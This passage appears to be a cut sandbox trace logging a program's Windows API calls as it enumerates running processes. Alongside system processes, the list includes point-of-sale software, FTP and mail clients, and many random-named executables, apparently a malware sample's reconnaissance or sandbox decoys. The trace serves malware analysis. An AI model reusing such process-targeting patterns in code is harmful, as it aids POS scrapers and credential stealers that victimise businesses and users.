th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0275.599] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0275.600] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0275.602] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0275.604] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0275.608] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0275.610] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0275.612] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0275.614] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0275.616] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0275.617] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0275.618] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0275.687] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.690] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0275.692] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0275.693] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0275.695] CloseHandle (hObject=0x1018) returned 1 [0275.695] Sleep (dwMilliseconds=0x64) [0275.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0275.846] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.847] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0275.849] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0275.850] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.852] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0275.854] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.858] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0275.859] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0275.861] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0275.862] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.864] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.865] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0275.866] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.868] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.869] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.891] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.893] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.894] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.896] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.898] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0275.899] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0275.901] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0275.907] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.909] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0275.912] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0275.915] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0275.916] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0275.921] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0275.923] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.925] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0275.927] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.929] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0275.931] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0275.984] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0275.986] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0275.987] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0275.989] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0275.990] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0275.991] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0275.993] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0275.994] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0275.999] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0276.000] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0276.002] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0276.003] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0276.004] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0276.006] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0276.007] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0276.008] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0276.010] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0276.015] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0276.016] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0276.018] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0276.019] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0276.021] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0276.022] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0276.023] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0276.025] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0276.048] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0276.050] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0276.052] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0276.054] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0276.055] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0276.058] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0276.063] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0276.065] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0276.067] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0276.069] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, 